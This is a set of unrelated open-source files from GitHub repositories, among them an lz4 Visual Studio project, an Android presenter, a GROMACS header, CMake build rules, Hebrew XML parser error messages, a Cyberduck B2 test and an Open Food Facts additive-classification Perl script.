<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<TargetName>liblz4</TargetName>
<IncludePath>$(IncludePath);$(UniversalCRT_IncludePath);$(SolutionDir)..\..\lib;$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<TargetName>liblz4</TargetName>
<IncludePath>$(IncludePath);$(UniversalCRT_IncludePath);$(SolutionDir)..\..\lib;$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);</IncludePath>
<RunCodeAnalysis>true</RunCodeAnalysis>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<TargetName>liblz4</TargetName>
<IncludePath>$(IncludePath);$(UniversalCRT_IncludePath);$(SolutionDir)..\..\lib;$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<TargetName>liblz4</TargetName>
<IncludePath>$(IncludePath);$(UniversalCRT_IncludePath);$(SolutionDir)..\..\lib;$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);</IncludePath>
<RunCodeAnalysis>true</RunCodeAnalysis>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;LZ4_DLL_EXPORT=1;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<TreatWarningAsError>true</TreatWarningAsError>
<EnablePREfast>false</EnablePREfast>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;LZ4_DLL_EXPORT=1;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<TreatWarningAsError>true</TreatWarningAsError>
<EnablePREfast>true</EnablePREfast>
<AdditionalOptions>/analyze:stacksize295252 %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;LZ4_DLL_EXPORT=1;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<TreatWarningAsError>false</TreatWarningAsError>
<EnablePREfast>false</EnablePREfast>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;LZ4_DLL_EXPORT=1;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<TreatWarningAsError>false</TreatWarningAsError>
<EnablePREfast>true</EnablePREfast>
<AdditionalOptions>/analyze:stacksize295252 %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="..\..\..\lib\lz4.h" />
<ClInclude Include="..\..\..\lib\lz4frame.h" />
<ClInclude Include="..\..\..\lib\lz4frame_static.h" />
<ClInclude Include="..\..\..\lib\lz4hc.h" />
<ClInclude Include="..\..\..\lib\xxhash.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\..\lib\lz4.c" />
<ClCompile Include="..\..\..\lib\lz4frame.c" />
<ClCompile Include="..\..\..\lib\lz4hc.c" />
<ClCompile Include="..\..\..\lib\xxhash.c" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="liblz4-dll.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
| {
"pile_set_name": "Github"
} |
package com.android.commonapp.presenter;
import com.android.commonapp.contact.BoutiqueContact;
import com.android.commonapp.contact.KnowledgePathContact;
import com.android.commonapp.interfaces.BasePresenterImpl;
import com.android.commonapp.models.BoutiqueModel;
import com.android.commonapp.models.CommonCallModel;
import com.android.commonapp.models.KnowledgePathModel;
import com.android.commonapp.network.CommonCallback;
import com.android.commonapp.network.RetrofitFactory;
import java.util.List;
/**
* @date: 2017/11/23.
* @author: CHEN
* @describe: 知识课件
*/
public class BoutiquePresenter extends BasePresenterImpl<BoutiqueContact.view> implements BoutiqueContact.presenter {
public BoutiquePresenter(BoutiqueContact.view view) {
super(view);
}
@Override
public void getKnowledgeBoutique(String id,String page, String size) {
//参数1 加载说明 参数2 是否需要触屏消失 参数3 是否需要显示进度条
view.showLoadingDialog("数据传输中,请稍后",false,false);
RetrofitFactory.getInstance().api().knowledgeboutique(id,page, size)
.enqueue(new CommonCallback<List<BoutiqueModel>>() {
@Override
protected void onSuccess(CommonCallModel<List<BoutiqueModel>> t) throws Exception {
view.dismissLoadingDialog();
if (t.getData() != null) {
view.success(t.getData());
}
}
@Override
protected void onFailure(Throwable e, boolean isNetWorkError, String msg) throws Exception {
view.dismissLoadingDialog();
view.failure(e, isNetWorkError, msg);
}
});
}
}
| {
"pile_set_name": "Github"
} |
<?php
$expected = array('$a3',
);
$expected_not = array('$a',
'$b',
'$a2',
);
?> | {
"pile_set_name": "Github"
} |
#include "shm_mutex.h"
ShmProcessMutexCheck& ShmProcessMutexCheck::getInstance() {
static ShmProcessMutexCheck singleton;
return singleton;
}
bool ShmProcessMutexCheck::addLock(const std::string& name) {
std::lock_guard<std::mutex> l(m_);
auto p = shmLocks_.emplace(name);
return p.second;
}
bool ShmProcessMutexCheck::removeLock(const std::string& name) {
std::lock_guard<std::mutex> l(m_);
return shmLocks_.erase(name) == 1;
}
| {
"pile_set_name": "Github"
} |
/*
* This file is part of the GROMACS molecular simulation package.
*
* Copyright (c) 2012,2013,2014,2015,2016 by the GROMACS development team.
* Copyright (c) 2018,2019,2020, by the GROMACS development team, led by
* Mark Abraham, David van der Spoel, Berk Hess, and Erik Lindahl,
* and including many others, as listed in the AUTHORS file in the
* top-level source directory and at http://www.gromacs.org.
*
* GROMACS is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public License
* as published by the Free Software Foundation; either version 2.1
* of the License, or (at your option) any later version.
*
* GROMACS is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with GROMACS; if not, see
* http://www.gnu.org/licenses, or write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
* If you want to redistribute modifications to GROMACS, please
* consider that scientific software is very special. Version
* control is crucial - bugs must be traceable. We will be happy to
* consider code for inclusion in the official distribution, but
* derived work must not be called official GROMACS. Details are found
* in the README & COPYING files - if they are missing, get the
* official version at http://www.gromacs.org.
*
* To help us fund GROMACS development, we humbly ask that you cite
* the research papers on the package. Check out http://www.gromacs.org.
*/
/*! \internal \file
* \brief Declare infrastructure for managing caching of OpenCL
* JIT-ted binaries
*
* This functionality is currently disabled in compileProgram()
*
* \author Dimitrios Karkoulis <[email protected]>
* \author Anca Hamuraru <[email protected]>
* \author Teemu Virolainen <[email protected]>
* \author Mark Abraham <[email protected]>
*/
#ifndef GMX_GPU_UTILS_OCL_CACHING_H
#define GMX_GPU_UTILS_OCL_CACHING_H
#include <string>
#include "gromacs/gpu_utils/oclutils.h"
namespace gmx
{
namespace ocl
{
/*! \brief Construct the name for the binary cache file
*
* \param[in] kernelFilename Name of the kernel from which the binary will be compiled.
* \param[in] deviceId ID of the device upon which the binary is used.
*
* \todo The set of preprocessor options should also form part of the
* identification of the cached binary. Also perhaps compiler, runtime
* and device version info?
*
* \todo Mutual exclusion of ranks and nodes should also be implemented
* if/when caching is re-enabled.
*
* \returns The name of the cache file.
*/
std::string makeBinaryCacheFilename(const std::string& kernelFilename, cl_device_id deviceId);
/*! \brief Check if there's a valid cache available, and return it if so
*
* \param[in] filename Name of valid file containing the binary cache
* \param[in] context The OpenCL context
* \param[in] deviceId The ID of the device on which to use the program
*
* \returns The OpenCL program read from the cache
*
* \throws InternalError if an OpenCL error was encountered
* FileIOError if the file could not be opened
*/
cl_program makeProgramFromCache(const std::string& filename, cl_context context, cl_device_id deviceId);
/*! \brief Implement caching of OpenCL binaries
*
* \param[in] program Index of program to cache
* \param[in] filename Name of file to use for the cache
*
* \throws InternalError if an OpenCL error was encountered
* FileIOError if the file could not be opened
*/
void writeBinaryToCache(cl_program program, const std::string& filename);
} // namespace ocl
} // namespace gmx
#endif
| {
"pile_set_name": "Github"
} |
# Add qdldl
add_subdirectory(qdldl_sources)
if(NOT DEFINED EMBEDDED)
set(
amd_sources
${CMAKE_CURRENT_SOURCE_DIR}/amd/include/amd_internal.h
${CMAKE_CURRENT_SOURCE_DIR}/amd/include/amd.h
${CMAKE_CURRENT_SOURCE_DIR}/amd/include/SuiteSparse_config.h
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_1.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_2.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_aat.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_control.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_defaults.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_info.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_order.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_post_tree.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_postorder.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_preprocess.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_valid.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/SuiteSparse_config.c
)
endif()
set(qdldl_interface_includes
${CMAKE_CURRENT_SOURCE_DIR}
${CMAKE_CURRENT_SOURCE_DIR}/amd/include
${CMAKE_CURRENT_SOURCE_DIR}/qdldl_sources/include
)
set(qdldl_interface_src
${amd_sources}
${CMAKE_CURRENT_SOURCE_DIR}/qdldl_interface.h
${CMAKE_CURRENT_SOURCE_DIR}/qdldl_interface.c
)
# Create object library for linear system solver interface
add_library(linsys_qdldl OBJECT ${qdldl_interface_src})
target_include_directories(linsys_qdldl PRIVATE ${qdldl_interface_includes} ${PROJECT_SOURCE_DIR}/include)
| {
"pile_set_name": "Github"
} |
/* test/r160test.c */
/* Copyright (C) 1995-1998 Eric Young ([email protected])
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young ([email protected]).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson ([email protected]).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young ([email protected])"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson ([email protected])"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
| {
"pile_set_name": "Github"
} |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Map Expat error codes to error strings
1 = הזיכרון אזל
2 = שגיאת תחביר
3 = לא נמצא רכיב שורש
4 = אינו בנוי היטב
5 = אסימון לא סגור
6 = אסימון לא סגור
7 = תגית לא מתאימה
8 = תכונה כפולה
9 = זבל אחרי מרכיב מסמך
10 = פרמטר לא חוקי בהפניה לישות
11 = ישות לא מוגדרת
12 = הפנית ישות רקורסיבית
13 = ישות לא מתואמת (א־סינכרונית)
14 = הפניה למספר תו לא חוקי
15 = הפנייה לישות בינארית
16 = הפנייה לישות חיצונית בתכונה
17 = הוראות עיבוד XML אינן בתחילת ישות חיצונית
18 = קידוד לא מוכר
19 = הקידוד שצוין בהכרזת XML אינו נכון
20 = מיקטע CDATA לא סגור
21 = שגיאה בעיבוד הפניה לישות חיצונית
22 = מסמך אינו עומד בפני עצמו
23 = unexpected parser state
24 = entity declared in parameter entity
27 = prefix not bound to a namespace
28 = must not undeclare prefix
29 = incomplete markup in parameter entity
30 = XML declaration not well-formed
31 = text declaration not well-formed
32 = illegal character(s) in public id
38 = reserved prefix (xml) must not be undeclared or bound to another namespace URI
39 = reserved prefix (xmlns) must not be declared or undeclared
40 = prefix must not be bound to one of the reserved namespace URIs
# %1$S is replaced by the Expat error string, may be followed by Expected (see below)
# %2$S is replaced by URL
# %3$u is replaced by line number
# %4$u is replaced by column number
XMLParsingError = שגיאה בניתוח XML: %1$S\nמיקום: %2$S שורה מספר %3$u, עמודה %4$u:
# %S is replaced by a tag name.
# This gets appended to the error string if the error is mismatched tag.
Expected = . היה צפוי: </%S>.
| {
"pile_set_name": "Github"
} |
package ch.cyberduck.core.b2;
/*
* Copyright (c) 2002-2017 iterate GmbH. All rights reserved.
* https://cyberduck.io/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
import ch.cyberduck.core.AlphanumericRandomStringService;
import ch.cyberduck.core.DescriptiveUrl;
import ch.cyberduck.core.DisabledLoginCallback;
import ch.cyberduck.core.DisabledPasswordCallback;
import ch.cyberduck.core.Path;
import ch.cyberduck.core.features.Delete;
import ch.cyberduck.core.features.PromptUrlProvider;
import ch.cyberduck.core.transfer.TransferStatus;
import ch.cyberduck.test.IntegrationTest;
import org.junit.Test;
import org.junit.experimental.categories.Category;
import java.util.Collections;
import java.util.EnumSet;
import static org.junit.Assert.*;
@Category(IntegrationTest.class)
public class B2AuthorizedUrlProviderTest extends AbstractB2Test {
@Test
public void testToUrl() throws Exception {
final Path bucket = new Path("/test-cyberduck", EnumSet.of(Path.Type.directory, Path.Type.volume));
final Path test = new Path(bucket, new AlphanumericRandomStringService().random(), EnumSet.of(Path.Type.file));
final B2FileidProvider fileid = new B2FileidProvider(session).withCache(cache);
new B2TouchFeature(session, fileid).touch(test, new TransferStatus());
final B2AuthorizedUrlProvider provider = new B2AuthorizedUrlProvider(session, fileid);
assertFalse(provider.isSupported(bucket, PromptUrlProvider.Type.download));
final DescriptiveUrl url = provider.toDownloadUrl(test, null, new DisabledPasswordCallback());
assertNotEquals(DescriptiveUrl.EMPTY, url);
assertNotNull(url.getUrl());
new B2DeleteFeature(session, fileid).delete(Collections.singletonList(test), new DisabledLoginCallback(), new Delete.DisabledCallback());
}
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/perl -w
# This file is part of Product Opener.
#
# Product Opener
# Copyright (C) 2011-2019 Association Open Food Facts
# Contact: [email protected]
# Address: 21 rue des Iles, 94100 Saint-Maur des Fossés, France
#
# Product Opener is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
use Modern::Perl '2017';
use utf8;
binmode STDIN, ':encoding(UTF-8)';
binmode STDOUT, ':encoding(UTF-8)';
my %europe = ();
my @levels = (
{
'e150'=>'',
'e470'=>'',
'e960' => 'Autorisé en Europe depuis le 2 décembre 2011',
'e441' => 'La gélatine est considérée en Europe comme un ingrédient et non un additif.',
'e428' => 'La gélatine est considérée en Europe comme un ingrédient et non un additif.',
},
{
'e120' => "Risque d'allergie.",
'e131'=>"Responsable d'allergies (urticaire) et soupçonné d'être cancérigène.<br/>
Interdit en Australie, au Canada, aux Etats-Unis et en Norvège.",
'e132'=>"Risque d'allergie. Interdit en Norvège.",
},
{
'e104'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e110'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e122'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e129'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e102'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
'e124'=>"Peut avoir un effet nuisible sur l’activité et l’attention des enfants.",
},
);
open(my $IN, "<:encoding(UTF-8)", "europe_2011.txt");
while (<$IN>) {
chomp;
if ($_ =~ /E (\w+)/) {
my $id = 'E' . $1;
$europe{lc($id)} = 1;
}
}
close ($IN);
open($IN, "<:encoding(UTF-8)", "additives_source.txt");
while (<$IN>) {
chomp;
my ($canon_name, $other_names, $misc, $desc, $level, $warning) = split("\t");
$level = -1;
(defined $desc) or ($desc = '');
(defined $warning) or ($warning = '');
for (my $i = 0; $i <= $#levels; $i++) {
if (defined $levels[$i]{lc($canon_name)}) {
$level = $i;
if ($level > 0) {
$warning = $levels[$i]{lc($canon_name)};
}
else {
$desc = $levels[$i]{lc($canon_name)};
}
}
}
if (($level < 0) and (not defined $europe{lc($canon_name)})) {
$level = 3;
$warning = "Additif non autorisé en Europe (liste N° 1129/2011 du 11 Novembre 2011)";
}
print $canon_name . "\t" . $other_names . "\t" . $misc . "\t" . $desc . "\t" . $level . "\t" . $warning . "\n";
}
close ($IN);
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.